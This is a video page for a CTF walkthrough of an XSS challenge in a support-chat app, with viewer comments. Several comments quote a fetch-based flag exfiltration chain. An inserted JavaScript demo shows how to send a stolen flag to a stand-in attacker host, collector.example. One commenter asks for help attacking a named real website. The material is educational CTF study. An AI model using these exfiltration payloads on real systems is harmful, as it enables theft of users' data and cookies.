XSS on the Wrong Domain T_T - Tech Support (web) Google CTF 2020

  • Published on 2 Oct 2024
  • Try chatting with tech support about getting a flag. There is a very easy XSS in the support chat, but the problem is, the XSS is on the wrong domain. So we can't easily grab the flag.
    Challenge: capturetheflag...
    Tech Support: typeselfsub.we...
    =[ ❤️ Support ]=
    → per Video: / liveoverflow
    → per Month: / @liveoverflow
    =[ 🐕 Social ]=
    → Twitter: / liveoverflow
    → Website: liveoverflow.com/
    → Subreddit: / liveoverflow
    → Facebook: / liveoverflow
    Don't spend money on courses

Comments • 103

  • @xyzzyx182 4 years ago +71

    Overflow is gaining such a deep understanding of computers that he's becoming one. How long before he can't beat reCAPTCHA?

  • @nyandesu9165 4 years ago +54

    "Or whatever, so no clue. But in the end, still solved it. Who cares."
    Every coder ever.

  • @zacksargent 4 years ago +95

    1:15 -> I think you did a bunch of those captchas wrong.
    When it says it wants the traffic lights, you selected the poles as well.

    • @heroslippy6666 4 years ago +21

      that feeling when the captcha thinks motorcycles and bicycles are the same thing.

    • @gyroninjamodder 4 years ago +3

      That's because the poles have traffic lights on them

    • @konradw360 4 years ago +22

      It's Google using the CTF players as free workers. If you want the flag, work 5 min for us :D

    • @Anonymous-vh6kp 4 years ago

      Konrad W correct

    • @abbb8615 4 years ago +1

      he a robot

  • @WitherBossEntity 4 years ago +69

    The endless reCaptcha looks about normal for when I use Tor.

    • @IAmOxidised7525 4 years ago +1

      Underrated comment..

    • @cat47 3 years ago +1

      ya lol, that's why I don't use it

  • @TheGrimravager 4 years ago +92

    Today I found a vulnerability in my job's codebase. Essentially arbitrary file deletion... patched that real quick.
    I like to think your videos gave me the thinking patterns needed to be able to spot this vulnerability. Thank you!

    • @Lolo5 4 years ago +2

      Give some more details please :)

    • @TheGrimravager 4 years ago +2

      @Lolo5 hmmm, no sorry :)

    • @ScorpioneOrzion 4 years ago +1

      @TheGrimravager what was the type of vulnerability, if you want to tell that?

    • @TheGrimravager 4 years ago +2

      @ScorpioneOrzion essentially arbitrary file deletion due to a non-sanitized call to PHP's unlink function. But luckily most files were not writable by the user that would execute the PHP script.

    • @NStripleseven 4 years ago

      Nice

  • @1vader 4 years ago +46

    Your usage of Promises is ... interesting ...
    The purpose of Promises is exactly to avoid the nesting you are doing and that you would usually get when using callbacks.
    You can just do this:
    fetch("/flag").then(r => r.text()).then(t => fetch(...))

    • @akuviljanen4695 4 years ago +6

      I think modern Chrome supports `await` in the console too

    • @TimLF 4 years ago

      @akuviljanen4695 only in an async function, as the exploit is not run in the console

    • @akuviljanen4695 4 years ago

      Fortunately it's easy to wrap everything into an async lambda

    • @AtheistReligionIsCancer 4 years ago

      Very good info.

    • @IBMboy 4 years ago

      Lol i did that too before learning how promises work

  • @Alkiiis 4 years ago +3

    There is also a solution where you find the username/password in document.referrer.
    github.com/weibell/ctf-google2020/tree/master/tech-support

  • @imflo1060 4 years ago +14

    13:39, 2 seconds too long :'(

  • @abadhaiku 3 years ago +3

    Imagine being on the other end of this... You open up a ticket from a user and suddenly two little embedded windows open and your password is leaked

  • @Zuudo 4 years ago +12

    those nested Promise#then calls cause me pain 😶

  • @Zedoy 4 years ago +7

    Managarmr is so awkward to pronounce 😂😂😂😂

    • @Anonymous-vh6kp 4 years ago +1

      Manager Mr

    • @ChillerDragon 4 years ago +1

      Should be smoother if it’s your teammate tho?

  • @barefeg 4 years ago +3

    Testing for XSS in all fields of my page RN 😅

  • @RonFarkash 4 years ago +2

    I recently started to learn some Web Application pen-testing, and a lot of the things here finally made sense for me, thank you for your detailed explanation.

  • @rishabhpant1828 4 years ago +2

    Bro, I have been eagerly waiting for this for a week...
    As a newbie, I wanted the walkthrough.
    Thank you so much, bro

  • @hweissi 4 years ago +1

    Hi, can you do a video writeup for the mathsh challenge from GoogleCTF? I am searching for a writeup of that challenge since the end of the CTF. I worked on that challenge for many hours but couldn't clear it, and I would just want to know if I was on the right track.

  • @KTibow 4 years ago +1

    If you want to get through captchas faster, only check 3 boxes. No more, no less.

  • @zCri 4 years ago +1

    wtf is that captcha lmfao

  • @kkaran6693 4 years ago +1

    Where can I learn this stuff????

  • @TheRetsekShow2236 4 years ago +2

    In your XSS when you have typed "fetch('/flag').then( r => { ....." What is "r"? Is it the "response" of the fetch request?

    • @machinexa1 4 years ago

      idk much JavaScript, but probably r is a custom function, and so is t

    • @dennis-heinrich 3 years ago

      Of course, it is the actual response if no error occurred in the (hopefully present) ".catch(err => { /** **/ })" function.
      developer.mozilla.org/en-US/docs/Web/API/Fetch_API/Using_Fetch

    • @machinexa1 3 years ago

      @malloc8634 nice

  • @AnPham-uz3td 4 years ago +1

    I think people with extensive knowledge about client-side would understand this haha

  • @warker_de 4 years ago +2

    🤯🤯🤯... watching this for the 5th time

  • @IAmOxidised7525 4 years ago +1

    Try using promises... that's what I thought when I saw timeouts...

  • @aayushk2845 4 years ago

    Hi, I'm pretty new to hacking and I wanted to try to find a vuln in iitianspace.com/login.php, pls help

  • @ManishShah-qk4lj 3 years ago

    Wow, amazing video, I love it, but I understand better in the Hindi language

  • @titiloxx 4 years ago

    If anyone has tried using CSRF, it does not work because the admin cannot change his address. Only normal users can. So you have to use some technique like preload, like this man did. Or just check document.referrer

  • @flyingpeter 3 years ago

    Jesus Christ, where does one even begin to solve that

  • @MisterL2_yt 3 years ago

    1:00 Wait a second how is there a traffic light in the last box he clicks? I would have failed that captcha...
    edit: nvm, it was him who failed the captchas lol

  • @jockillfull 4 years ago

    Have you played the CSAW? I saw team ALLES, it's yours, right? How did it go?

  • @attention_shopping 4 years ago +1

    great stuff, didn't know self-xss was vulnerable in this way!

  • @felchore 4 years ago +1

    Awesome video, thanks!

  • @DHIRAL2908 4 years ago +1

    PWN challenges please!!!

  • @WhiteBoiDave 4 years ago +1

    Could you get us deeper into SDR? Would be great!

  • @unknown-mh9fk 4 years ago

    You see, from doing CTFs and watching videos I was able to follow. I was like, wow, I really learned a lot, I can follow this... until about 6 minutes, then I was like -_- what

  • @blobthekat 2 years ago

    2:23 learn how to use promises man

  • @Channel-he5fr 2 years ago

    Do you like John Hammond?

  • @danielkrajnik3817 3 years ago

    1:30 that's a lot of dedication

  • @kmcat 4 years ago +3

    When I read the flag name, I sometimes think I could have guessed that

    • @gameglitcher 4 years ago +2

      That's great, except for the no-brute-forcing-flags condition on CTFs :)

  • @zsin128 4 years ago +9

    Why don't you use Firefox?

    • @LiveOverflow 4 years ago +8

      Why don’t you use Chrome?

    • @zsin128 4 years ago +1

      @LiveOverflow it eats RAM (and is slower than Firefox on my PC)

    • @0xecho 4 years ago +5

      @zsin128 lol you're out here fighting about browsers, while I'm out here curling the page and imagining what it looks like in my head

    • @0xecho 4 years ago

      P.S. I do not recommend that, not fun

    • @pipony8939 4 years ago +1

      Why don't you use Internet Explorer?

  • @DawnnDusk-k4n 4 years ago

    Come on... Next
    Give me the next video, LiveOverflow!!!

  • @appsecjourney8907 4 years ago

    Hello brother, can I ask you some questions?
    You said you are using Linux in Docker. How do you set up Linux in Docker to get the external IP?

    • @crossetta 4 years ago

      Google is your friend

  • @realyoutubekumar 3 years ago

    that captcha tho...😅

  • @diegodejesus9668 4 years ago

    Do you think that with the passage of time, the systems will be more secure and hacking will be almost impossible (or unnecessary)?

  • @soggytoast111 4 years ago +2

    Are you sure that setTimeout actually does anything? I've run into issues before when trying to use setTimeout to control a data flow - it's still all executed instantly and doesn't work the same way as async/await/promise.

    • @laurinneff4304 4 years ago +2

      setTimeout, at least in my experience, works, but he should've used async/await or promises in this case

    • @pietrohideki 4 years ago +1

      If you have some doubts or think you need some more insight on setTimeout, I suggest you search on YouTube for "what the heck is the event loop anyway". It's a video of around 26 minutes which gives a good insight into the event loop and how sometimes setTimeout is used in the wrong way. Hope this helps
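
The Promise thread further up (@1vader's comment and its replies) and this setTimeout thread both come down to one question: how an XSS payload should sequence "read /flag, then send it somewhere the attacker can read it". The following is an added example, not code from the video, from LiveOverflow, or from any commenter. It replaces fetch with a constructed in-memory stub with adjustable latency so it runs offline in Node; the origins support.example and collector.example, the /flag path as used here, the `d` query parameter and the flag value are all made up for illustration.

```javascript
// Added example (not from the video or the comments): three ways to sequence
// "read /flag, then send it to a collector" from an XSS payload, run against a
// constructed fetch() stub so it works offline in Node. All hostnames, paths
// and the flag value below are made up for illustration.
const FLAG = "CTF{constructed-example-flag}";

// Stub for the browser's fetch(): answers after `latencyMs` and records every
// value that reaches the hypothetical attacker-controlled host collector.example.
function makeFakeFetch(latencyMs) {
  const sent = [];
  const fetchImpl = (url) => new Promise((resolve) => {
    setTimeout(() => {
      const u = new URL(url, "https://support.example"); // assumed app origin
      if (u.pathname === "/flag") {
        resolve({ ok: true, text: async () => FLAG });
      } else if (u.hostname === "collector.example") {
        sent.push(u.searchParams.get("d"));
        resolve({ ok: true, text: async () => "" });
      } else {
        resolve({ ok: false, text: async () => "" });
      }
    }, latencyMs);
  });
  return { fetchImpl, sent };
}

// URL the payload sends the stolen value to (hypothetical query parameter `d`).
const collectorUrl = (data) =>
  "https://collector.example/?d=" + encodeURIComponent(String(data));

// 1. Sequencing with a fixed setTimeout: the payload guesses how long the
//    /flag request takes. If the guess is too short, `flag` is still
//    undefined when the collector request fires, so the attacker receives
//    the literal string "undefined". Resolves to the value actually sent.
function exfilWithTimeout(fetchImpl, waitMs) {
  return new Promise((resolve) => {
    let flag;
    fetchImpl("/flag").then((r) => r.text()).then((t) => { flag = t; });
    setTimeout(() => {
      const snapshot = flag;
      fetchImpl(collectorUrl(snapshot)).then(() => resolve(snapshot));
    }, waitMs);
  });
}

// 2. Flat promise chain: every .then() returns the next promise, so the
//    collector request cannot start before the flag text has arrived.
function exfilChained(fetchImpl) {
  let flag;
  return fetchImpl("/flag")
    .then((r) => r.text())
    .then((t) => { flag = t; return fetchImpl(collectorUrl(t)); })
    .then(() => flag);
}

// 3. async/await: the same ordering, readable top to bottom. In a payload
//    that is not typed into the console, wrap it in an async IIFE:
//    (async () => { await exfilAwait(fetch); })();
async function exfilAwait(fetchImpl) {
  const r = await fetchImpl("/flag");
  if (!r.ok) throw new Error("/flag returned an error");
  const t = await r.text();
  await fetchImpl(collectorUrl(t));
  return t;
}

// Runs each variant against a fresh stub and reports what the collector saw.
async function demo(latencyMs, waitMs) {
  const variants = {
    timeout: (f) => exfilWithTimeout(f, waitMs),
    chained: exfilChained,
    asyncAwait: exfilAwait,
  };
  const out = {};
  for (const [name, run] of Object.entries(variants)) {
    const { fetchImpl, sent } = makeFakeFetch(latencyMs);
    const returned = await run(fetchImpl);
    out[name] = { returned, sent };
  }
  return out;
}

// Fast server: all three deliver the flag. Slow server: only the timeout
// variant breaks, while the other two still deliver it.
demo(5, 50).then((r) => console.log("latency 5ms, wait 50ms:", JSON.stringify(r)));
demo(100, 50).then((r) => console.log("latency 100ms, wait 50ms:", JSON.stringify(r)));
```

Run it with node. With a 5 ms server and a 50 ms wait all three variants deliver the flag; with a 100 ms server the setTimeout variant sends the string "undefined" to the collector, while the chained and async/await variants still deliver the flag, because their second request is ordered by the promise resolution rather than by a guessed delay.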

  • @52.yusrilihsanadinatanegar79 4 years ago

    *captcha lol*

  • @tera_hz7125 4 years ago

    Team pasten wants to know your location

  • @shubhamdwivedi7766 4 years ago

    I passed the captcha in 2 trials lol😂

  • @lab-at-home 4 years ago

    Funny, I solved this guy using the referrer. I guess it was not the intended solution

    • @Timooooooooooooooo 4 years ago

      Do you have a write up (or short explanation) of your solution? I'm very interested in it

  • @vendybirdsvadl7472 4 years ago

    Is there a CTF for beginners? Or something like that?

  • @DiggOlive 4 years ago

    Less Smoked Leet Chicken

  • @cassandradawn780 4 years ago

    WOW, I'm early. 4 min ago

  • @yashb.pandhare5772 4 years ago

    🧐👍🤝🤜👌

  • @moriartyshelby1618 4 years ago +1

    "who cares" in a nutshell in this video...XD

  • @BERTDELASPEED 4 years ago

    I wish I had that knowledge 😑

  • @aashikyadav4439 4 years ago

    Wish I could understand this.

  • @muddassirahmed3342 4 years ago

    wha?

  • @4n1eu 4 years ago

    I don't understand anything

    • @soggytoast111 4 years ago +2

      The short version:
      The tech support app has a bug in it that allows you to post content that will be parsed as JavaScript. This is a major security vulnerability known as XSS.
      The point of the challenge is to get the Google bot to leak out its cookie by having it trigger your inserted malicious JavaScript code.
      But you can't simply grab the cookie and send it back to you because the CORS check will block it. So the solution is you have to do all kinds of acrobatics with your JavaScript code and a second XSS to walk the Google bot around the site and log in and out on different sessions.

    • @internetdoggo4839 4 years ago

      Understandable. I had to watch it 3 times to understand it